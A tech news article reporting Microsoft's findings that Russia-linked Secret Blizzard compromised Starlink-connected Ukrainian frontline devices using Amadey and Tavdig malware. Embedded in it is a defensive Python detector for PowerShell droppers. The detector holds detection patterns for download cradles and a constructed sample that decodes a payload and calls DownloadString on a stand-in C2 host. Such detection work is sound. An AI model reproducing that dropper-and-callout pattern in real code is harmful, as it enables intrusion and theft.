Microsoft confirms Ukrainian frontline was hit with hacks traced back to Russia

Hackers connected to the Russian government launched a cyberattack against Starlink-connected devices being used on the Ukrainian frontline.

TL;DR: Hackers linked to the Russian government targeted Starlink-connected devices on the Ukrainian frontline in a cyberattack.

A group of hackers connected to the Russian government has launched cyberattacks against Starlink-connected infrastructure in Ukraine to target devices being used by Ukrainian soldiers on the frontline. Microsoft has confirmed that the infrastructure was compromised, and investigators still do not know which vulnerability was exploited.

Microsoft has labeled the group "Secret Blizzard," and according to reports and the latest Microsoft Security blog post, in at least one instance this year when Ukrainian frontline devices were targeted, Secret Blizzard used infrastructure created by a cybercrime group Microsoft tracks as Storm-1919. In another instance, Secret Blizzard leveraged infrastructure from another group called Storm-1837, a Russia-based cybercrime group that targets Ukrainian drone operations.

So, how did they gain access to the infrastructure? Microsoft explains that between March and April this year, the cybercriminals used a bot swarm attack to install the XMRig cryptocurrency miner on targeted servers. Typically, hackers install this malware and then use the device's resources to mine a cryptocurrency, which they sell online for real money. However, Microsoft writes that the ultimate objective of the bot swarm malware was to install Tavdig, a backdoor Secret Blizzard used to conduct reconnaissance on the target device.

Microsoft explains that when Secret Blizzard identifies an individual as a high-value target, it deploys the Tavdig backdoor and collects valuable information such as browser passwords, user information, netstat output, installed patches, registry settings, and more.

"Microsoft assesses that Secret Blizzard either used the Amadey malware as a service (MaaS) or accessed the Amadey command-and-control (C2) panels surreptitiously to download a PowerShell dropper on target devices," Microsoft said. "The PowerShell dropper contained a Base64-encoded Amadey payload appended by code that invoked a request to Secret Blizzard C2 infrastructure."

Microsoft adds that Tavdig would also result in additional reconnaissance software being installed on devices "of further interest by the threat actor - for example, devices egressing from STARLINK IP addresses, a common signature of Ukrainian front-line military devices."
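The dropper shape Microsoft describes above, a Base64-encoded payload appended by code that calls out to C2 infrastructure, is something a defender can hunt for in collected PowerShell script blocks. The heuristic below is an added example, not Microsoft's detection logic or any artifact from the incident: the size threshold, the sample scripts and the URL are constructed for illustration.

```python
import base64
import re
from dataclasses import dataclass

# Decoded size (bytes) above which a Base64 blob counts as an embedded payload
# rather than a short encoded setting. The threshold is an assumption.
MIN_PAYLOAD_BYTES = 256

B64_BLOB = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
WEB_REQUEST = re.compile(
    r"Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b|Net\.WebClient|"
    r"DownloadString|DownloadFile|Start-BitsTransfer", re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)

@dataclass
class Finding:
    suspicious: bool      # both elements present, in dropper order
    payload_bytes: int    # decoded size of the largest Base64 blob
    urls: list            # URLs for the analyst to check against C2 intel

def decoded_len(blob: str) -> int:
    """Decoded length of a Base64 blob, or 0 if it is not valid Base64."""
    try:
        return len(base64.b64decode(blob, validate=True))
    except ValueError:
        return 0

def analyze_script(text: str) -> Finding:
    """Flag a script only when a sizeable Base64 payload is followed by an
    outbound request. Either element alone is routine in benign automation."""
    largest, blob_end = 0, -1
    for m in B64_BLOB.finditer(text):
        n = decoded_len(m.group(0))
        if n > largest:
            largest, blob_end = n, m.end()
    request_after = blob_end >= 0 and WEB_REQUEST.search(text, blob_end) is not None
    return Finding(largest >= MIN_PAYLOAD_BYTES and request_after, largest, URL.findall(text))

# Constructed samples: a benign update check and a script with the dropper shape.
BENIGN = 'Invoke-WebRequest -Uri "https://updates.example.com/list.json" | ConvertFrom-Json'
FAKE_PAYLOAD = base64.b64encode(b"NOT-A-REAL-PAYLOAD " * 20).decode()  # 380 bytes
SUSPECT = (f'$p = "{FAKE_PAYLOAD}"\n'
           '[IO.File]::WriteAllBytes("$env:TEMP\\a.bin", [Convert]::FromBase64String($p))\n'
           '(New-Object Net.WebClient).DownloadString("http://c2.example.invalid/beacon")\n')

if __name__ == "__main__":
    for name, script in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, analyze_script(script))
```

Run over script blocks from PowerShell logging (event 4104) rather than a single file, since a dropper may be split across several blocks; the size threshold will need tuning against your own automation.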

News source: microsoft.com

Jak joined the TweakTown team in 2017 and has since reviewed 100s of new tech products and kept us informed daily on the latest science, space, and artificial intelligence news. Jak's love for science, space, and technology, and, more specifically, PC gaming, began at 10 years old. It was the day his dad showed him how to play Age of Empires on an old Compaq PC. Ever since that day, Jak fell in love with games and the progression of the technology industry in all its forms.
